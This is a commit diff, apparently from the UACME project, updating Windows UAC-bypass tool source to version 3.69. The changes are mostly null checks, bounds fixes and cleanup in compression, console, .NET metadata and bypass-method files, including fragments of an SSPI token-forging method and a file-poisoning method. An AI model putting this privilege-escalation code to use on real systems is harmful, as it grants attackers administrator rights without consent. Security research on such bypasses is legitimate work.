hfiref0x
diff --git a/‎Source/Akagi/Resource.rc‎
0 Bytes b/‎Source/Akagi/Resource.rc‎
0 Bytes
diff --git a/‎Source/Akagi/compress.c‎
Lines changed: 6 additions & 3 deletions b/‎Source/Akagi/compress.c‎
Lines changed: 6 additions & 3 deletions
diff --git a/‎Source/Akagi/console.c‎
Lines changed: 10 additions & 3 deletions b/‎Source/Akagi/console.c‎
Lines changed: 10 additions & 3 deletions
diff --git a/‎Source/Akagi/fusutil.c‎
Lines changed: 53 additions & 44 deletions b/‎Source/Akagi/fusutil.c‎
Lines changed: 53 additions & 44 deletions
diff --git a/‎Source/Akagi/methods/antonioCoco.c‎
Lines changed: 22 additions & 5 deletions b/‎Source/Akagi/methods/antonioCoco.c‎
Lines changed: 22 additions & 5 deletions
diff --git a/‎Source/Akagi/methods/azagarampur.c‎
Lines changed: 36 additions & 34 deletions b/‎Source/Akagi/methods/azagarampur.c‎
Lines changed: 36 additions & 34 deletions
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2014 - 2022
+*  (C) COPYRIGHT AUTHORS, 2014 - 2025
 *
 *  TITLE:       COMPRESS.C
 *
-*  VERSION:     3.61
+*  VERSION:     3.69
 *
-*  DATE:        22 Jun 2022
+*  DATE:        07 Jul 2025
 *
 *  Compression and encoding/decoding support.
 *
@@ -133,6 +133,9 @@ BOOL IsValidContainerHeader(
 {
     DWORD HeaderCrc;
 
+    if (UnitHeader == NULL)
+        return FALSE;
+
     __try {
         if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) &&   //Naka
             (UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) &&   //Naka
 
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2022
+*  (C) COPYRIGHT AUTHORS, 2022 - 2025
 *
 *  TITLE:       CONSOLE.C
 *
-*  VERSION:     3.62
+*  VERSION:     3.69
 *
-*  DATE:        08 Jul 2022
+*  DATE:        07 Jul 2025
 *
 *  Debug console.
 *
@@ -115,9 +115,16 @@ VOID ConsoleRelease(
 )
 {
     DWORD dwStop = GetTickCount() + (10 * 1000);
+    HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);
+
+    if (nStdHandle == NULL || nStdHandle == INVALID_HANDLE_VALUE) {
+        FreeConsole();
+        return;
+    }
 
     ConsolePrint(TEXT("[+] Press Enter to exit or wait few seconds and it will close automatically\r\n"));
 
+    FlushConsoleInputBuffer(nStdHandle);
     while (!ConsoleIsKeyPressed(VK_RETURN) && GetTickCount() < dwStop)
         Sleep(50);
 
 
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2020 - 2021
+*  (C) COPYRIGHT AUTHORS, 2020 - 2025
 *
 *  TITLE:       FUSUTIL.C
 *
-*  VERSION:     3.58
+*  VERSION:     3.69
 *
-*  DATE:        01 Dec 2021
+*  DATE:        07 Jul 2025
 *
 * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -376,12 +376,18 @@ BOOL fusUtilReferenceStreamByName(
 
     do {
         pStorStream = (STORAGESTREAM*)streamPtr;
+        if (IsBadReadPtr(pStorStream->rcName, sizeof(CHAR)))
+            return FALSE;
+
         if (_strcmpi_a(pStorStream->rcName, StreamName) == 0) {
             *StreamRef = pStorStream;
             return TRUE;
         }
 
         nameLen = _strlen_a(pStorStream->rcName) + 1;
+        if (nameLen > MAXUSHORT)
+            return FALSE;
+
         offset = ALIGN_UP(FIELD_OFFSET(STORAGESTREAM, rcName) + nameLen, ULONG);
         streamPtr = (PBYTE)RtlOffsetToPointer(streamPtr, offset);
         i++;
@@ -435,59 +441,62 @@ BOOL fusUtilGetImageMVID(
         cliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(baseAddress, TRUE,
             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);
 
-        pStorSign = (STORAGESIGNATURE*)RtlOffsetToPointer(baseAddress, cliHeader->MetaData.VirtualAddress);
-        if (pStorSign->lSignature == STORAGE_MAGIC_SIG) {
-
-            offset = FIELD_OFFSET(STORAGESIGNATURE, pVersion) + pStorSign->iVersionString;
-            pStorHeader = (STORAGEHEADER*)RtlOffsetToPointer(pStorSign, offset);
+        if (cliHeader && sz >= sizeof(IMAGE_COR20_HEADER)) {
 
-            pStreamTables = NULL;
-            if (!fusUtilReferenceStreamByName(pStorHeader, "#~", &pStreamTables)) {
-                FreeLibrary(hModule);
-                return FALSE;
-            }
+            pStorSign = (STORAGESIGNATURE*)RtlOffsetToPointer(baseAddress, cliHeader->MetaData.VirtualAddress);
+            if (pStorSign && !IsBadReadPtr(pStorSign, sizeof(STORAGESIGNATURE)) &&
+                pStorSign->lSignature == STORAGE_MAGIC_SIG)
+            {
+                offset = FIELD_OFFSET(STORAGESIGNATURE, pVersion) + pStorSign->iVersionString;
+                pStorHeader = (STORAGEHEADER*)RtlOffsetToPointer(pStorSign, offset);
 
-            pStreamGuid = NULL;
-            if (!fusUtilReferenceStreamByName(pStorHeader, "#GUID", &pStreamGuid)) {
-                FreeLibrary(hModule);
-                return FALSE;
-            }
+                pStreamTables = NULL;
+                if (!fusUtilReferenceStreamByName(pStorHeader, "#~", &pStreamTables)) {
+                    FreeLibrary(hModule);
+                    return FALSE;
+                }
 
-            pTablesHeader = (STORAGETABLESHEADER*)RtlOffsetToPointer(pStorSign, pStreamTables->iOffset);
-            sz = 0;
-
-            //
-            // __popcnt64 or the garbage code below
-            //
-            for (i = 0; i < MAX_CLR_TABLES; i++)
-                if ((i < 32 && (pTablesHeader->Valid.u.LowPart >> i) & 1) ||
-                    (i >= 32 && (pTablesHeader->Valid.u.HighPart >> i) & 1))
-                {
-                    sz++;
+                pStreamGuid = NULL;
+                if (!fusUtilReferenceStreamByName(pStorHeader, "#GUID", &pStreamGuid)) {
+                    FreeLibrary(hModule);
+                    return FALSE;
                 }
 
-            offset = FIELD_OFFSET(STORAGETABLESHEADER, Rows) + (sz * sizeof(ULONG));
+                pTablesHeader = (STORAGETABLESHEADER*)RtlOffsetToPointer(pStorSign, pStreamTables->iOffset);
+                sz = 0;
+
+                //
+                // __popcnt64 or the garbage code below
+                //
+                for (i = 0; i < MAX_CLR_TABLES; i++)
+                    if ((i < 32 && (pTablesHeader->Valid.u.LowPart >> i) & 1) ||
+                        (i >= 32 && (pTablesHeader->Valid.u.HighPart >> i) & 1))
+                    {
+                        sz++;
+                    }
 
-            tablesPtr = (PBYTE)RtlOffsetToPointer(pTablesHeader, offset);
-            tablesPtr += sizeof(WORD);
+                offset = FIELD_OFFSET(STORAGETABLESHEADER, Rows) + (sz * sizeof(ULONG));
 
-            if (pTablesHeader->HeapOffsetSizes & MD_STRINGS_BIT)
-                tablesPtr += sizeof(DWORD);
-            else
+                tablesPtr = (PBYTE)RtlOffsetToPointer(pTablesHeader, offset);
                 tablesPtr += sizeof(WORD);
 
-            if (pTablesHeader->HeapOffsetSizes & MD_GUIDS_BIT)
-                mvidIndex = *(PULONG)tablesPtr;
-            else
-                mvidIndex = *(PUSHORT)tablesPtr;
+                if (pTablesHeader->HeapOffsetSizes & MD_STRINGS_BIT)
+                    tablesPtr += sizeof(DWORD);
+                else
+                    tablesPtr += sizeof(WORD);
+
+                if (pTablesHeader->HeapOffsetSizes & MD_GUIDS_BIT)
+                    mvidIndex = *(PULONG)tablesPtr;
+                else
+                    mvidIndex = *(PUSHORT)tablesPtr;
 
-            if (mvidIndex) {
-                guidsPtr = (LPGUID)RtlOffsetToPointer(pStorSign, pStreamGuid->iOffset);
-                RtlCopyMemory(ModuleVersionId, &guidsPtr[mvidIndex - 1], sizeof(GUID));
-                bResult = TRUE;
+                if (mvidIndex) {
+                    guidsPtr = (LPGUID)RtlOffsetToPointer(pStorSign, pStreamGuid->iOffset);
+                    RtlCopyMemory(ModuleVersionId, &guidsPtr[mvidIndex - 1], sizeof(GUID));
+                    bResult = TRUE;
+                }
             }
         }
-
         FreeLibrary(hModule);
     }
 
 
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2023
+*  (C) COPYRIGHT AUTHORS, 2023 - 2025
 *
 *  TITLE:       ANTONIOCOCO.C
 *
-*  VERSION:     3.65
+*  VERSION:     3.69
 *
-*  DATE:        01 Oct 2023
+*  DATE:        07 Jul 2025
 *
 *  UAC bypass method from antonioCoco.
 *
@@ -482,6 +482,7 @@ BOOL ucmxRpcAppendRequestData_Binary(
 {
     DWORD dwBytesAvailable = 0;
     DWORD dwDataLength = DataLength;
+    DWORD dwPadding = 0;
 
     if (IsUnicode)
         dwDataLength *= sizeof(WCHAR);
@@ -492,11 +493,13 @@ BOOL ucmxRpcAppendRequestData_Binary(
     if (RpcConnection->dwRequestInitialized == 0)
         return FALSE;
 
+    dwPadding = CALC_ALIGN_PADDING(dwDataLength, sizeof(ULONG));
+
     //
     // Calculate number of bytes remaining in the input buffer.
     //
     dwBytesAvailable = sizeof(RpcConnection->bProcedureInputData) - RpcConnection->dwProcedureInputDataLength;
-    if (dwDataLength > dwBytesAvailable)
+    if ((dwDataLength + dwPadding) > dwBytesAvailable)
     {
         //
         // Set input error flag.
@@ -510,7 +513,7 @@ BOOL ucmxRpcAppendRequestData_Binary(
     //
     RtlCopyMemory(&RpcConnection->bProcedureInputData[RpcConnection->dwProcedureInputDataLength], Data, dwDataLength);
     RpcConnection->dwProcedureInputDataLength += dwDataLength;
-    RpcConnection->dwProcedureInputDataLength += CALC_ALIGN_PADDING(dwDataLength, sizeof(ULONG));
+    RpcConnection->dwProcedureInputDataLength += dwPadding;
 
     return TRUE;
 }
@@ -715,6 +718,10 @@ SECURITY_STATUS ucmxForgeNetworkAuthToken(
         negotiateBuffer.cbBuffer = MAX_MESSAGE_SIZE;
         negotiateBuffer.BufferType = SECBUFFER_TOKEN;
         negotiateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
+        if (negotiateBuffer.pvBuffer == NULL) {
+            secStatus = SEC_E_INSUFFICIENT_MEMORY;
+            break;
+        }
 
         secStatus = InitializeSecurityContext(&hCredClient,
             NULL,
@@ -738,6 +745,10 @@ SECURITY_STATUS ucmxForgeNetworkAuthToken(
         challengeBuffer.cbBuffer = MAX_MESSAGE_SIZE;
         challengeBuffer.BufferType = SECBUFFER_TOKEN;
         challengeBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
+        if (challengeBuffer.pvBuffer == NULL) {
+            secStatus = SEC_E_INSUFFICIENT_MEMORY;
+            break;
+        }
 
         secStatus = AcceptSecurityContext(&hCredServer,
             NULL,
@@ -758,6 +769,10 @@ SECURITY_STATUS ucmxForgeNetworkAuthToken(
         authenticateBuffer.cbBuffer = MAX_MESSAGE_SIZE;
         authenticateBuffer.BufferType = SECBUFFER_TOKEN;
         authenticateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);
+        if (authenticateBuffer.pvBuffer == NULL) {
+            secStatus = SEC_E_INSUFFICIENT_MEMORY;
+            break;
+        }
 
         secStatus = InitializeSecurityContext(NULL,
             &clientContextHandle,
@@ -815,6 +830,8 @@ SECURITY_STATUS ucmxForgeNetworkAuthToken(
 * Purpose:
 *
 * Bypass UAC using SSPI datagram context.
+* 
+* Fixed by MS ninja patch (including old Win10 releases).
 *
 */
 NTSTATUS ucmSspiDatagramMethod(
 
@@ -4,9 +4,9 @@
 *
 *  TITLE:       AZAGARAMPUR.C
 *
-*  VERSION:     3.67
+*  VERSION:     3.69
 *
-*  DATE:        11 Feb 2025
+*  DATE:        07 Jul 2025
 *
 *  UAC bypass methods from AzAgarampur.
 *
@@ -280,38 +280,37 @@ NTSTATUS ucmNICPoisonMethod(
     //
     // Restore original file contents and permissions.
     //
-    if (origFileBuffer && lpTargetFileName) {
-
-        hFile = CreateFile(lpTargetFileName,
-            GENERIC_WRITE,
-            0,
-            NULL,
-            OPEN_EXISTING,
-            0,
-            NULL);
+    if (origFileBuffer) {
+        if (lpTargetFileName) {
+            hFile = CreateFile(lpTargetFileName,
+                GENERIC_WRITE,
+                0,
+                NULL,
+                OPEN_EXISTING,
+                0,
+                NULL);
 
-        if (hFile != INVALID_HANDLE_VALUE) {
-            WriteFile(hFile, origFileBuffer, origSize, &bytesIO, NULL);
-            SetEndOfFile(hFile);
-            CloseHandle(hFile);
+            if (hFile != INVALID_HANDLE_VALUE) {
+                WriteFile(hFile, origFileBuffer, origSize, &bytesIO, NULL);
+                SetEndOfFile(hFile);
+                CloseHandle(hFile);
+            }
         }
 
         supVirtualFree(origFileBuffer, NULL);
+    }
 
-        if (oldSecurity) {
-
-            if (bSecurityReset) {
-
-                ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,
-                    DACL_SECURITY_INFORMATION,
-                    SE_FILE_OBJECT,
-                    oldSecurity);
-
-            }
-
-            CoTaskMemFree(oldSecurity);
+    if (oldSecurity) {
+        if (bSecurityReset && lpTargetFileName) {
+            ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,
+                DACL_SECURITY_INFORMATION,
+                SE_FILE_OBJECT,
+                oldSecurity);
         }
+        CoTaskMemFree(oldSecurity);
+    }
 
+    if (lpTargetFileName) {
         supHeapFree(lpTargetFileName);
     }
 
@@ -1876,10 +1875,17 @@ NTSTATUS ucmxGenerateAUX(
 
             asmName->lpVtbl->Finalize(asmName);
             asmName->lpVtbl->Release(asmName);
+            asmName = NULL;
         }
 
-        if (FAILED(hr) || bFound == FALSE)
+        if (FAILED(hr) || bFound == FALSE) {
+            if (asmName) {
+                asmName->lpVtbl->Finalize(asmName);
+                asmName->lpVtbl->Release(asmName);
+                asmName = NULL;
+            }
             break;
+        }
 
         lpDisplayNameANSI = (LPSTR)supHeapAlloc((1 + cchDisplayName) * sizeof(CHAR));
         if (lpDisplayNameANSI == NULL)
@@ -1985,12 +1991,8 @@ NTSTATUS ucmxGenerateAUX(
     if (asmEnum)
         asmEnum->lpVtbl->Release(asmEnum);
 
-    if (!NT_SUCCESS(ntStatus)) {
-
-        if (auxPtr)
-            supHeapFree(auxPtr);
-
-    }
+    if (!NT_SUCCESS(ntStatus) && auxPtr)
+        supHeapFree(auxPtr);
 
     return ntStatus;
 }
Original file line number	Diff line number	Diff line change
`@@ -1,12 +1,12 @@`
`1`	`1`	`/*******************************************************************************`
`2`	`2`	`*`
`3`		`-* (C) COPYRIGHT AUTHORS, 2014 - 2022`
	`3`	`+* (C) COPYRIGHT AUTHORS, 2014 - 2025`
`4`	`4`	`*`
`5`	`5`	`* TITLE: COMPRESS.C`
`6`	`6`	`*`
`7`		`-* VERSION: 3.61`
	`7`	`+* VERSION: 3.69`
`8`	`8`	`*`
`9`		`-* DATE: 22 Jun 2022`
	`9`	`+* DATE: 07 Jul 2025`
`10`	`10`	`*`
`11`	`11`	`* Compression and encoding/decoding support.`
`12`	`12`	`*`
`@@ -133,6 +133,9 @@ BOOL IsValidContainerHeader(`
`133`	`133`	`{`
`134`	`134`	`DWORD HeaderCrc;`
`135`	`135`
	`136`	`+ if (UnitHeader == NULL)`
	`137`	`+ return FALSE;`
	`138`	`+`
`136`	`139`	`__try {`
`137`	`140`	`if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) && //Naka`
`138`	`141`	`(UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) && //Naka`
Original file line number	Diff line number	Diff line change
`@@ -1,12 +1,12 @@`
`1`	`1`	`/*******************************************************************************`
`2`	`2`	`*`
`3`		`-* (C) COPYRIGHT AUTHORS, 2022`
	`3`	`+* (C) COPYRIGHT AUTHORS, 2022 - 2025`
`4`	`4`	`*`
`5`	`5`	`* TITLE: CONSOLE.C`
`6`	`6`	`*`
`7`		`-* VERSION: 3.62`
	`7`	`+* VERSION: 3.69`
`8`	`8`	`*`
`9`		`-* DATE: 08 Jul 2022`
	`9`	`+* DATE: 07 Jul 2025`
`10`	`10`	`*`
`11`	`11`	`* Debug console.`
`12`	`12`	`*`
`@@ -115,9 +115,16 @@ VOID ConsoleRelease(`
`115`	`115`	`)`
`116`	`116`	`{`
`117`	`117`	`DWORD dwStop = GetTickCount() + (10 * 1000);`
	`118`	`+ HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);`
	`119`	`+`
	`120`	`+ if (nStdHandle == NULL \|\| nStdHandle == INVALID_HANDLE_VALUE) {`
	`121`	`+ FreeConsole();`
	`122`	`+ return;`
	`123`	`+ }`
`118`	`124`
`119`	`125`	`ConsolePrint(TEXT("[+] Press Enter to exit or wait few seconds and it will close automatically\r\n"));`
`120`	`126`
	`127`	`+ FlushConsoleInputBuffer(nStdHandle);`
`121`	`128`	`while (!ConsoleIsKeyPressed(VK_RETURN) && GetTickCount() < dwStop)`
`122`	`129`	`Sleep(50);`
`123`	`130`